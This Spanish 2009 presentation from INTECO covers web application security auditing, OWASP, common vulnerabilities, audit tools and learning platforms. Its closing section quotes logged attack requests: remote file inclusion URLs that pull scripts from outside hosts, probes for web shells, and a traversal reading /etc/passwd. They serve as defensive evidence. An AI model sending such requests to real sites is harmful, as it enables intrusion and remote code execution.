SEGURIDAD WEB: AUDITORÍAS Y HERRAMIENTAS

Daniel Firvida Pereira

daniel.firvida@inteco.es

Marzo de 2009

2

Seguridad Web: Auditorías y Herramientas

0. Presentación INTECO

1. Auditorías Web1) Introducción a la Seguridad Web2) OWASP & WASC3) Vulnerabilidades Web hoy en día4) Procedimientos y técnicas de auditoria Web

2. Experiencias de INTECO-CERT1) Experiencias de colaboración de INTECO-CERT

Índice

3

Seguridad Web: Auditorías y Herramientas

3. Herramientas de auditoría Web1) Aplicaciones comerciales de auditoria para Web.2) Aplicaciones gratuitas de auditoria para Web.3) Plataformas de aprendizaje

4. Otras fuentes de Información1) El otro lado: trazas de un ataque Web2) Concursos y Retos

Índice

4

El Instituto Nacional de Tecnologías de la Comunicación, INTECO

5

Actuaciones en e-Confianza de INTECO

Instituto Nacional de Tecnologías de la Comunicación

Convergencia de España con Europa Crear en León un "Cluster-TIC" con alta capacidad de innovación. Transversalidad tecnológica entre sectores y áreas de conocimiento TICAlta localización de conocimiento intensivo y conexión con otros centros

internacionales.

OBJETIVOS

Sociedad estatal adscrita al MITYC a través de SETSIInstrumento del Plan Avanza para el desarrollo de la S.IPilares: Investigación aplicada, prestación de servicios y formación

1. ¿Qué es INTECO?

6

2. Líneas estratégicas de actuación

Actuaciones en e-Confianza de INTECO

Ciudadanía e Internet

Innovación TIC y Competitividad PYME

Centro de Respuesta a Incidentes en Tecnologías de la Información para PYMEs y Ciudadanos

Centro Demostrador de Tecnologías de la Seguridad

Observatorio de Seguridad de la Información

e-Confianza (Seguridad)

Laboratorio Nacional de Calidad

Formación

Promoción de proyectos TIC

Promoción de estándares y normalización

Calidad SW

Centro de Referencia en Accesibilidad y Estándares Web

Centro Nacional de Tecnologías de la Accesibilidad

Área de I+D+i en Accesibilidad Web.

Centro de Gestión de servicios públicos interactivos - TDT

Accesibilidad

7

Actuaciones en e-Confianza de INTECO

3. Proyectos en e-Confianza

Sentar las bases de coordinación de iniciativas públicas entorno a la Seguridad Informática

Coordinar la investigación aplicada y la formación especializada en el ámbito de la seguridad TIC

Centro de referencia en Seguridad Informática a nivel nacional

Observatorio de la Seguridad de la información

INTECO CERTCentro Demostrador de

Tecnologías de la Seguridad

8

Objetivos

Impulsar la confianza en las nuevas tecnologías promoviendo su uso de forma segura y responsableMinimizar los perjuicios ocasionados por incidentes de seguridad, accidentes o fallos facilitando mecanismos de prevención y reacción adecuadosPrevenir, informar, concienciar y formar a la pyme y el ciudadano proporcionando información clara y concisa acerca de la tecnología y el estado de la seguridad en Internet.

INTECO-CERT

9

Servicios de Información:• Suscripción a boletines y alertas• Actualidad, noticias y eventos• Avisos online sobre nuevos virus, vulnerabilidades, virus más extendidos

por correo electrónico, información sobre correo electrónico no deseado.Servicios de Formación: guías, manuales, cursos onlineServicios de Protección: útiles gratuitos y actualizaciones de softwareServicios de Respuesta y Soporte:• Gestión y resolución de Incidencias• Gestión de Malware o código malicioso• Fraude electrónico• Asesoría Legal• Foros

Servicios de INTECO-CERT en materia de seguridad: http://cert.inteco.es

INTECO-CERT

10

Servicios de Información: Vulnerabilidades y Malware

Colaboración con NIST-NVDTraducción de más de 33.800 vulnerabilidadesClasificación por nivel de severidadAportación de vulnerabilidades descubiertas.

INTECO-CERT

11

Más de 170 sensores más de 100 millones de correos procesados al día.0,40% de detección de correos infectados de virus informáticos en más de 40.000 millones de correos analizados.Información de detecciones de malware en correo en https://ersi.inteco.es/

Servicios de Información: Virus en el correo electrónico. Red de sensores de Virus.

INTECO-CERT

12

CORREOS ELECTRÓNICOS

Servicios de Información: SPAM. Red de sensores de SPAM.

https://ersi.inteco.es/

INTECO-CERT

13

Guías y Manuales.Buenas prácticas.Preguntas frecuentes.

FormaciónServicios de Formación y Protección.

Descarga de útiles gratuitos de seguridadInformación sobre actualizaciones de software, parches etc..Zonas de seguridad por plataformas: Linux, Microsoft, MacOS, Dispositivos Móviles.

Protección

INTECO-CERT

14

Servicios de Formación y Protección.Protección

Avisos y alertas de seguridad, a través de boletines y web.

INTECO-CERT

15

Resolución y ayuda ante incidentes de seguridad.Análisis y recomendaciones de seguridad.Sistemas de detección de malware en la red.

Gestión de incidencias o problemas de seguridadServicios de Respuesta y Soporte.

Desarrollo de herramientas propias: CONAN. Configuration Analisys.

Recoge información del PC susceptible de ser modificada por código malicioso y cualquier otra información que nos sirva para determinar si el PC estáo no correctamente configurado.

INTECO-CERT

16

Buzón de Consultas, Foros de Usuarios y Asesoría Legal de Derecho en las Nuevas Tecnologías

Difusión de Guías de buenas prácticas y Manuales de concienciación y formación sobre legislación y normativas en materia de Seguridad TIC.

Guías de implantación de medidas que faciliten el cumplimiento de las disposiciones legales.

Asesoría Legal

Servicios de Respuesta y Soporte.

legal@cert.inteco.es

INTECO-CERT

17

Información a los usuarios sobre todos los tipos de fraude electrónico a través de foros y buzón fraude@cert.inteco.es.

Repositorio de fraude de INTECO con información estructurada de los fraudes detectados

creación de inteligencia sobre fraude electrónico en España.

Colaboración con entidades financieras, FCSE, ISPs y registradores de dominios.

Lucha contra el Fraude

Servicios de Respuesta y Soporte.

INTECO-CERT

18

Objetivos

Fomentar y difundir el uso de tecnologías de seguridad de la información

Centro Demostrador de Tecnologías de la Seguridad

Catálogo de Soluciones y ProveedoresAnálisis de productos de seguridadFormación a la PYMEDifusión e impulso de la tecnología de seguridadImpulso del DNI electrónico y SGSI

http://demostrador.inteco.es

19

Catálogo de empresas y soluciones

Catalogación de todos los actores del mercado, datos de proveedor.

Catalogación de los productos que ofrecen, datos de producto.

Catalogación de los servicios que ofrecen, datos de servicio.

Centro Demostrador de Tecnologías de la Seguridad

Catálogo impreso

20

Catálogo online

Centro Demostrador de Tecnologías de la Seguridad

21

Centro Demostrador de Tecnologías de la Seguridad

Taxonomía de productos y servicios

Productos (31 categorías) Servicios (14 categorías)

22

Centro Demostrador de Tecnologías de la Seguridad

DATOS ACTUALES DEL CATÁLOGO OFERTA ACTUAL DE PRODUCTOS

557 1007

Nº DE EMPRESAS

Nº DE SOLUCIONES

OFERTA ACTUAL DE SERVICIOS

Anti - Malware 64

Sistemas de seguridad de datos 45

Filtro y control de contenidos 38

Autenticación 104

Políticas de Seguridad 128

Planificación e implantación de infraestructuras 107

Cumplimiento con la legislación (LOPD,..) 102

Certificación y Acreditación 61

23

Análisis y demostración de productos y soluciones de seguridad

Ámbito y alcance de la aplicación

Conocer sus capacidades y características

Análisis funcional y estructural

Ayuda a los fabricantes

Laboratorio de nuevos productos y tecnologías

Generar recomendaciones

Centro Demostrador de Tecnologías de la Seguridad

24

Difusión e impulso de la tecnología de seguridad

Estudio de mercado sobre las soluciones de seguridad TIC

Identificar nichos en la industria TIC española

Promoción de alianzas

Potenciar la tecnología de seguridad española y promover su desarrollo

Acuerdos con entidades de otros países

Centro Demostrador de Tecnologías de la Seguridad

25

Centro Demostrador de Tecnologías de la Seguridad

Promoción de alianzas

• Empresas: convenios de colaboración

• Asociaciones: relación con todas las patronales del

sector.

• Actores proactivos: banca, universidades,…

50 convenios 8 convenios

2008 2009

26

Centro Demostrador de Tecnologías de la Seguridad

• Eventos propios• I ENISE

II ENISE

27

Formación a la Pyme

Identificación de amenazas

Elaboración de contenidos

Impulso cultura de seguridad

Impulso del uso de tecnologías de seguridad

Centro Demostrador de Tecnologías de la Seguridad

2200

25

90

Jornadas celebradas

Pymes sensibilizadas

Media de asistentes

28

Líneas Generales

Programa de Impulso de los SGSI (Sistema de Gestión de Seguridad de la Información)

INTECO recibe la encomienda de

Gestión

Colabora con

Organizan

Seleccionan

Seleccionan

Colabora

Colabora

JORNADAS Y TALLERES

SGSI

INTECO

CÁMARAS DE COMERCIO

CATÁLOGO EMPRESAS IMPLANTACIÓN SGSI

PYME

CATÁLOGO ORGANISMOS

CERTIFICACIÓN SGSI

29

Los niveles de garantía de seguridad EAL1 y EAL3 indican la profundidad y rigor exigido en la evaluación de las aplicaciones que se quieran certificar.

Unas Guías que facilitarán a los desarrolladores el cumplimiento con los perfiles se podrán descargar del Portal del DNIe de INTECO

Los Perfiles de Protección son documentos que especifican una solución de seguridad: la creación y verificación de firma electrónica con DNIe:

adoptan la legislación y normativa nacional y europeadefinen el nivel de garantía de seguridad que ofrece una aplicación certificada que cumpla con el perfil

Impulso DNIe: Perfiles de Protección

Van a servir para desarrollar ycertificar aplicaciones de firma con DNIe con garantías de seguridad:Tipo 1: para plataformas TDT, PDA’s o teléfonos móvilesTipo 2: para ordenadores personales con S.O. de propósito general

30

Servicios gratuitos de Información a través del portal web, RSS o suscripción• Actualidad, noticias y eventos• Alertas y estadísticas en tiempo real sobre la seguridad en España

Servicios gratuitos de Formación en Seguridad de la Información• Manuales sobre legislación vigente• Configuración de seguridad en sistemas• Guías de resolución de problemas de seguridad • Buenas prácticas para la prevención de problemas de seguridad

Servicios gratuitos de Protección: • Catálogo de útiles gratuitos de seguridad• Catálogo de actualizaciones de software

Servicios gratuitos de Respuesta y Soporte:• Gestión y resolución de Incidencias de Seguridad• Gestión y soporte ante fraude electrónico• Asesoría Legal

Servicios prestados a pymes y ciudadanos:

Resumen de Servicios de eConfianza.

31

INTECO-CERT

• contacto@cert.inteco.es

• incidencias@cert.inteco.es

• fraude@cert.inteco.es

• legal@cert.inteco.es

• http://cert.inteco.es

• info.demostrador@inteco.es

• catalogo.demostrador@inteco.es

• jornadas.pyme@inteco.es

• http://demostrador.inteco.es

Centro Demostrador de Tecnologías de la Seguridad

Contactos

32

Dónde estamos

www.inteco.es

Sede de INTECO

Avda. Jose Aguado 41Edificio INTECO24005 LEÓN

Tel: (+34) 987 877 189Fax: (+34) 987 261 016

Sede de INTECO

Avda. Jose Aguado 41Edificio INTECO24005 LEÓN

Tel: (+34) 987 877 189Fax: (+34) 987 261 016

33

¿Preguntas?

34

Seguridad Web

35

Problemática de seguridad en las aplicaciones Web

• Cada vez son aplicativos mas complejos y dinámicos.• Resultan “fáciles” comprometer o atacar.• Muchas veces están accesibles desde Internet y forman parte del

perímetro de seguridad de la empresa.• Se trata de aplicaciones sin visión de la seguridad en su desarrollo.• La seguridad en Internet no depende exclusivamente de la seguridad de la

red o de los sistemas, sino también de las aplicaciones que están accesibles

La seguridad de las aplicaciones Web resulta muy importante y para ello debemos auditarlas y asegurarnos de que no suponen un riesgo para la organización.

Introducción a la seguridad Web

1. Auditorías Web

36

¿Qué es OWASP?• Fundación sin animo de lucro.• Creada en 2001.• Independiente de los fabricantes.• Formada por voluntarios.

Objetivos:• Promover la seguridad de las aplicaciones web.• Buscar las causas de la inseguridad.• Proporcionar soluciones a las amenazas.• Crear herramientas, documentación y estándares.

OWASP: Open Web Application Security Project

1. Auditorías Web

37

¿Qué hace OWASP?• Recursos para equipos de desarrollo.• Foros de discusión.• Aplicaciones para auditoria y para formación.• Documentación y artículos.

Proyectos dentro de OWASP:• Webscarab: Herramienta para auditoria.• WebGoat: Herramienta para formación.• OWASP Testing: Metodología.• Web Application Penetration Checklist: Documentación.• OWASP Guide y Top Ten Project: Documentación.

OWASP: Open Web Application Security Project

1. Auditorías Web

38

WASC: Web Application Security Consortium

¿Qué es WASC?• Participada por la industria, expertos y organizaciones.• Foro abierto de participación.

Objetivos:• Promover estándares de seguridad web.• Elaboración de artículos y guías de seguridad web.• Compartir el conocimiento sobre las amenazas web.

Proyectos:• Application Security Scanner Evaluation Criteria.• Web Hacking Incidents Database.• Distributed Open Proxy Honeypots. • Web Security Threat Classification.

1. Auditorías Web

39

• Vulnerabilidades Web

1. Auditorías Web

El vector de ataque de las Vulnerabilidades Web son las PeticionesEl protocolo HTTP define diversos tipos de peticiones conocidos como métodos, los comunes son los siguientes:• OPTIONS: Permite listar todos los métodos permitidos por el servidor.• GET: Sirve para solicitar un objeto Web, admite parámetros• HEAD: Solicita la cabecera HTTP del servidor Web.• POST: Sirve para solicitar un objeto Web, admite parámetros.• PUT: Permite enviar un fichero al servidor Web.• DELETE: Borra un objeto Web.• TRACE: Tiene como finalidad propósitos de depuración.• CONNECT: Permite conectar a otro servidor host (proxy, webserver, ...).

40

• Vulnerabilidades Web

1. Auditorías Web

Problemática: Autenticación en aplicaciones Web

• Autenticación anónima (sin autenticación)• Autenticación a través de la propia aplicación Web

• Basada en formularios mediante peticiones de tipo GET / POST• Autenticación basada en el protocolo HTTP

• HTTP Tipo Basic• HTTP Tipo Digest

• Autenticación a través de credenciales del sistema operativo• Cuentas de usuario locales o del dominio (AD, ldap, ...)• Seguridad en función del sistema de ficheros (NTFS, ...)

41

• Vulnerabilidades Web

1. Auditorías Web

Ataques a los mecanismos de autenticación en las aplicaciones Web:• Captura de credenciales (sniffing o hijacking)

• Si las credenciales de autenticación no viajan por un canal cifrado (SSL) es posible capturar las credenciales de autenticación utilizadas.

• Identificación de cuentas de usuario validas• Respuestas diferentes cuando el usuario introducido es incorrecto de

cuando es la contraseña introducida es incorrecta • Denegación de servicio a los mecanismos de autenticación

• A realizar n intentos de autenticación fallidos y la aplicación no esta correctamente parametrizada es posible bloquear las cuentas de usuario

• Ataque por Fuerza Bruta o Diccionario• Si se combina la identificación de usuario con una incorrecta política

de bloqueo de cuentas puede realizarse estos ataques

42

• Vulnerabilidades Web

1. Auditorías Web

Problemática: Gestión de las Sesiones en las aplicaciones Web

• El protocolo HTTP es un protocolo sin estado, se necesitan identificadores de sesión.

• La gestión de sesiones es un proceso ligado con el proceso de autenticación de usuario.

• Se asocia al usuario un identificador de Sesión que este enviara a la aplicación Web en cada petición

• El identificador de sesión es generalmente una cadena de caracteres generada “aleatoriamente”

• El identificador de sesión forma parte de la cabecera HTTP, como Cookie. Aunque es posible enviarlo en peticiones de tipo GET o POST

43

• Vulnerabilidades Web

1. Auditorías Web

Ataques a los mecanismos de gestión de identificadores de Sesión• Ataques de interceptación de sesión

• Existen diferentes ataques de intercepción por ejemplo: sniffing, XSS, SQL injection, etc.

• Ataques por predicción del identificador• Si la cadena de caracteres del identificador no es suficientemente

aleatoria puede permitir su predicción• Ataques por Fuerza Bruta

• Si el algoritmo utilizado para la generación del identificador no es suficientemente robusto, puede ser posible obtener una sesión valida por fuerza bruta

• Ataques de Fijación de sesión• Si la aplicación no gestiona la caducidad de las sesiones o asocia

siempre la misma sesión a un mismo usuario puede permitir el robo de sesiones por diversos métodos (virus, hijacking, etc)

44

• Vulnerabilidades Web

1. Auditorías Web

Problemática: Validación de caracteres de entrada y salida• Incorrecto control de los caracteres en variables de entrada.

• SQL injection• Command Injection• Inclusión de código script de servidor.• Idap injection• Include path• Transversal Directory

• Incorrecto control de los tamaños de las variable de entrada• Desbordamientos de Buffer• Denegaciones de Servicio

Ataques de validación de I/O:• El limite es la imaginación

45

• Vulnerabilidades Web hoy en dia:

El Top 10 de vulnerabilidades de OWASP

Cross Site Scripting (XSS).

Inyecciones de código.

Ejecución de ficheros maliciosos.

Manipulación de rutas a objetos.

Cross Site Request Forgery (CSRF).

Manejo inadecuado de errores.

1. Auditorías Web

46

• Vulnerabilidades Web hoy en dia:

El Top 10 de vulnerabilidades de OWASP

Robo de credenciales de sesión o de control de acceso.

Almacenamiento de datos inseguro.

Comunicaciones por un canal inseguro.

Fallo en la ocultación de URLs de gestión.

http://www.owasp.org/index.php/Top_10_2007

http://www.owasp.org/index.php/Top_10_2004

1. Auditorías Web

47

Utilización de la herramienta adecuada a cada aplicativo.

Metodología de auditoria.OWASP Testing.Web Application Penetration Checklist.OSSTMM.

Chequear todos los resultados de las herramientas.

Uso de herramientas para localización de URLs ocultas.

Conocer en lo posible la aplicación.

1. Auditorías Web

48

Documentarse sobre las vulnerabilidades existentes.

Uso de distintos patrones de los ataquesXSS (Cross Site Scripting) Cheat Sheet - http://ha.ckers.org/xss.htmlXSSDB attack database - http://www.gnucitizen.org/xssdb/

Captura de evidencias.

No realizar denegaciones de Servicio.

Uso de herramientas de aprendizaje como WebGoat o participación en concursos de hacking

1. Auditorías Web

49

Es importante no menospreciar las fugas de información en las respuestas del servidorEs necesario validar todos los caracteres de entrada en las variables de peticiones GET y POST Hay que generar identificadores de sesión complejos, con aleatoriedad, enviarlos a través de las Cookies y con caducidad Utilización de contraseñas fuertes.Validar el identificador de sesión en todas las páginas.No almacenar las contraseñas en claro en la Base de Datos.No utilizar variables ocultas que no deseen ser vistas o modificadas por el usuario.

1. Auditorías Web

50

Resolución y ayuda ante incidentes de seguridad.Análisis y recomendaciones de seguridad.Sistemas de detección de malware en la red.

Gestión de incidencias o problemas de seguridad

Ministerio de Vivienda: A partir de un incidente de seguridad en la pagina web se realizo un análisis exhaustivo de la seguridad de la misma.

Foro Internacional de Contenidos Digitales:Revisión de seguridad de la Web del Foro Internacional de Contenidos Digitales (FICOD 2008) del Ministerio de Industria.

2. Experiencias de INTECO-CERT

51

Vulnerabilidades de SQL injection.• Con obtención de usuarios y contraseñas.

Incorrecto manejo de sesiones.• Posibilidad de saltarse la autenticación y obtener una sesión

privilegiada en la aplicación. Incorrecta configuración del servidor.

• Listado de directorios.• Obtención de información sensible del servidor.• Acceso a ficheros de logs.

Versiones no actualizadas o con vulnerabilidades.• Versiones de PHP, del gestor de contenidos, etc.

Vulnerabilidades más encontradas

2. Experiencias de INTECO-CERT

52

Propósito múltiple (no exclusivas por vulnerabilidad).

Capacidad de auditoria ante cualquier tipo de aplicativo.

Incorporan utilidades para pruebas manuales.

Aspectos Configurables.

Proporcionan abundante documentación.

Suelen ser herramientas lentas.

Tienen muchos falsos positivos.

Un elevado precio.

• Aplicaciones comerciales

Características comunes

3. Herramientas de auditoría Web

53

• Acunetix Web Vulnerability Scanner

3. Herramientas de auditoría Web

54

• IBM Rational AppScan

3. Herramientas de auditoría Web

55

• HP WebInspect

3. Herramientas de auditoría Web

56

La mayoría son para un propósito especifico.

Tienen limitaciones para algún tipo de aplicativo.

Incorporan utilidades para pruebas manuales.

Mayor capacidad de configuración.

Proporcionan menos documentación.

Suelen ser herramientas lentas.

Tienen muchos falsos positivos.

Son gratis ☺.

• Aplicaciones gratuitas

Características comunes

3. Herramientas de auditoría Web

57

• WebScarab

3. Herramientas de auditoría Web

58

• Paros

3. Herramientas de auditoría Web

59

• w3af

3. Herramientas de auditoría Web

60

• Plataformas de aprendizaje: WEBGOAT

3. Herramientas de auditoría Web

61

• Plataformas de aprendizaje: WEBGOAT

3. Herramientas de auditoría Web

Video Soluciones

http://yehg.net/lab/pr0js/training/webgoat.php

62

• Plataformas de aprendizaje: HACKME FOUNDSTONE

http://www.foundstone.com/us/resources-free-tools.asp

3. Herramientas de auditoría Web

63

Búsqueda de un objetivo para un ataque

GET /horde-3.0.6//README HTTP/1.1GET /horde-3.0.7//README HTTP/1.1GET /horde-3.0.8//README HTTP/1.1GET /email//README HTTP/1.1GET /webmail//README HTTP/1.1GET /mailz//README HTTP/1.1GET /horde2//README HTTP/1.1

GET //scgi/awstats/awstats.pl HTTP/1.1GET //scripts/awstats.pl HTTP/1.1GET //cgi-bin/awstats/awstats.pl HTTP/1.1GET //cgi-bin/stats/awstats.pl HTTP/1.1GET //scgi-bin/stats/awstats.pl HTTP/1.1

CONNECT 195.175.37.70:8080 HTTP/1.0OPTIONS * HTTP/1.0

4. Otras fuentes de Información

64

Búsqueda de un objetivo para un ataque

GET /phpMyAdmin/main.php HTTP/1.0GET /phpmyadmin/main.php HTTP/1.0GET /phpmyadmin/tbl_select.php HTTP/1.1GET /phpmyadmin0/tbl_select.php HTTP/1.1GET /mysql/phpmyadmin/tbl_select.php HTTP/1.1GET /xampp/phpmyadmin/tbl_select.php HTTP/1.1GET /phpmyadmin2/read_dump.php HTTP/1.0GET /phpMyAdmin-2.2.3/read_dump.php HTTP/1.0

GET /phpmyadmin/r57.php HTTP/1.1GET /phpmyadmin/c99.php HTTP/1.1GET /phpmyadmin/shell.php HTTP/1.1GET /phpmyadmin/cmd.php HTTP/1.1

GET /w00tw00t.at.ISC.SANS.MSlog:) HTTP/1.1GET /w00tw00t.at.ISC.SANS.Pwn!t:) HTTP/1.1GET /w00tw00t.at.ISC.SANS.DFind:) HTTP/1.1

4. Otras fuentes de Información

65

Trazas de un intento de ataque/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.thera

nchjohnstown.com/menu/r7?? HTTP/1.1

/en/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.a ltervista.org/a.txt?? HTTP/1.1

/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://sh311.alter vista.org/a.txt?? HTTP/1.1

/textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://ft p.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%FF /1? HTTP/1.1

//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp://80.50.253.9 0/upload/071011004039p/old? HTTP/1.1

/_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254&STRMVER=4&CAPREQ=0 HTTP/1.1

4. Otras fuentes de Información

66

Trazas de un intento de ataque

GET /includes/orderSuccess.inc.php?&glob=1&cart_order_id=1&glob[rootDir]=http://80.3 4.102.151/joomla/1.gif?/ HTTP/1.1

Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-usConnection: CloseHost: 85.17.35.XUser-Agent: Morfeus Fucking Scannermod_security-action: 406

HTTP/1.1 406 Not AcceptableConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1

4. Otras fuentes de Información

67

Trazas de un intento de ataque

GET /textos/en//amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=ftp:/ /ftp.metaltrade.ru/incoming/%FF%FF%FF%FF%FF%FFo%FF%FF%FF%FF%FF%F F/1? HTTP/1.1

Connection: TE, closeHost: www.X.comTE: deflate,gzip;q=0.3User-Agent: libwww-perl/5.808mod_security-action: 406

HTTP/1.1 406 Not AcceptableConnection: closeTransfer-Encoding: chunkedContent-Type: text/html; charset=iso-8859-1

4. Otras fuentes de Información

68

Trazas de un intento de ataque

GET /cgi-bin/netauth.cgi?cmd=show&page=../../../../../../../../../../etc/passwd HTTP/1.0Connection: Keep-AliveContent-Length: 0Host: www.X.netUser-Agent: Mozilla/4.75 (Nikto/1.35 )mod_security-action: 406

HTTP/1.1 406 Not AcceptableConnection: closeContent-Type: text/html; charset=iso-8859-1

4. Otras fuentes de Información

69

CONCURSOS Y RETOS

Retos Hacking (I – IX)

http://elladodelmal.blogspot.com/search/label/Reto%20Hacking

Concurso BSGAME #1

http://blindsec.com:81/ http://www.yoire.com/1190-primer-torneo-de-seguridad-blindsec-bsgame-1

SecGame SG6Labs

http://www.sg6.es/labs/

4. Otras fuentes de Información

70

¿Preguntas?

71

Muchas gracias

www.inteco.es